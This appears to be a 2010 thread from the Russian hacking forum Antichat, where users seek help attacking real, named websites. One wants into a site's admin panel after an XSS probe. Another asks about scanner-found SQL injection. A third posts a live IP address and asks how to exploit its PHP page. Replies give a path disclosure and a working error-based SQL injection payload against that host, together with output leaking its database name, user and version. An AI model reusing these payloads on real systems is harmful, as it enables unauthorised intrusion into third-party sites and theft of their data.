ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.10.2010, 11:32
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от high_rez
Ужасно глупый вопрос.
Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?
В моем браузере отключены скритпы.
Скорее всего - да, но лучше покажи ссылку.
|
|
|
07.10.2010, 11:48
|
|
Новичок
Регистрация: 23.08.2009
Сообщений: 1
Провел на форуме:
21192
Репутация:
0
|
|
Вот ссылка.
http://www.vishime.ru/news/zhizn-goroda-v-fotografiyah/?page=16
Уж очень сильно хочу попасть в его админку www.vishime.ru/admin/ ))) Вроде как сделан с помощью django framework. Сервер в США, Техас, Apach, Fedora.
Я просто игрался с "?page=%00alert(123)"
И получил от своего браузера предупреждение о XSS.
И еще сразу вопрос, почему при гугл запросе site:vishime.ru filetype: любой, нет ничего? Стоит запрет на отображение, что ли?
|
|
|
|
07.10.2010, 15:15
|
|
Новичок
Регистрация: 03.12.2006
Сообщений: 24
Провел на форуме:
177837
Репутация:
7
|
|
Сообщение от AdDa
Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).
сканировать, имеется ли страница в наличие, если да то сохранить что она отображает, скрипт хорошо, но есть ли програмка.
|
|
|
|
07.10.2010, 18:52
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от nemans
сканировать, имеется ли страница в наличие, если да то сохранить что она отображает, скрипт хорошо, но есть ли програмка.
http://nswx.ru/forum/showthread.php?t=8270
|
|
|
|
07.10.2010, 23:49
|
|
Познающий
Регистрация: 05.10.2010
Сообщений: 48
Провел на форуме:
8669
Репутация:
5
|
|
Просканировал один хост WVS-ом,он обнаружил SQL-уязвимости следующего вида .
Код:
?category=10' and 1=0&page=2'
Ввожу в браузере - толку ноль.В чем причина ? |
|
|
|
07.10.2010, 23:53
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
возможно просто нет вывода ошибок.
а вообще бросайте эти сканнеры и учитесь сначала искать руками. когда будет опыт, тогда и сканнеры в помощь.
|
|
|
|
08.10.2010, 00:25
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
никто не знает урлы онлайн-сканеров директорий сайта
раньше знал пару, но они не пашут уже
|
|
|
|
08.10.2010, 02:03
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
93.84.115.243/bans/ban_details.php
Можно че нить раскрутить? а то у меня чето не получается = \
|
|
|
|
08.10.2010, 02:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от GroM88
93.84.115.243/bans/ban_details.php
Можно че нить раскрутить? а то у меня чето не получается = \
path disclosure если что..
O:\home\93.84.115.243\www\
|
|
|
|
08.10.2010, 04:05
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
[-_-]
Сообщение от None
http://93.84.115.243/bans/ban_details.php?bid=928+and+(select+1+from+(select +count(0),concat((select+concat_ws(0x3a,database() ,user(),version())),floor(rand(0)*2))+from+informa tion_schema.tables+group+by+2)bb)
Сообщение от None
Duplicate entry 'bans:bans1@localhost:5.1.40-community1' for key 'group_key'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
